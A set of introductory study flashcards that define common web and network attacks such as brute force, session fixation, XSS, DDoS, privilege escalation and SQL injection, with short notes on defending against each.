Attacks Flashcards
How does a brute force attack work?
Try every combination to break into a system
How can a brute force attack be made easier for the attacker
Humans are predictable and therefore many passwords follow a pattern
How can we defend from a brute force attack
Timeouts - only allow for x attempts per min
Limit number of attemps
Captchas - should stop bots
What is a man in the middle attack?
When a bad actor intercepts data, and forwards it to the intended recipient after reading it
What is one type of cookie theft?
Session fixation - An attacker sets a user’s session id to one that they have set up
What is another type of cookie theft?
Malware can be used to steal cookie files from the victim’s computer so that they can be impersonated on websites
What is cross site scripting?
Exploits flaws in the client or server to trick the computer into running outside code as if it were trustworthy
How can we defend against cookie theft?
Authentication and tamper detection
What is a DDos attack?
Distributed denial of service.
How does a DDos attack work?
A botnet is created by infecting lots of computers
These then send thousands of requests to a server(s) at once
How can servers defend from DDos attacks?
Traffic filtering - IP rep. lists, deep packet inspection, black/whitelisting, rate limiting
Load balancing - Move traffic to other servers
What is a vertical privilege escalation attack?
When a lower privilege user gets access to content reserved for higher access users.
What is a horizontal privilege escalation attack?
When a user accesses content reserved for other users on the same access level (if a bank user a gets access to user b’s bank account)
What is an SQL injection attack?
When attackers concatenate strings in input to gain access to the database
How can we protect from SQL injection attacks?
Sanitizing data: Control what the user is allowed to input
Configure error reports: These can often tell attackers lots about a system
Type checks: If the input is supposed to be an int, make it an int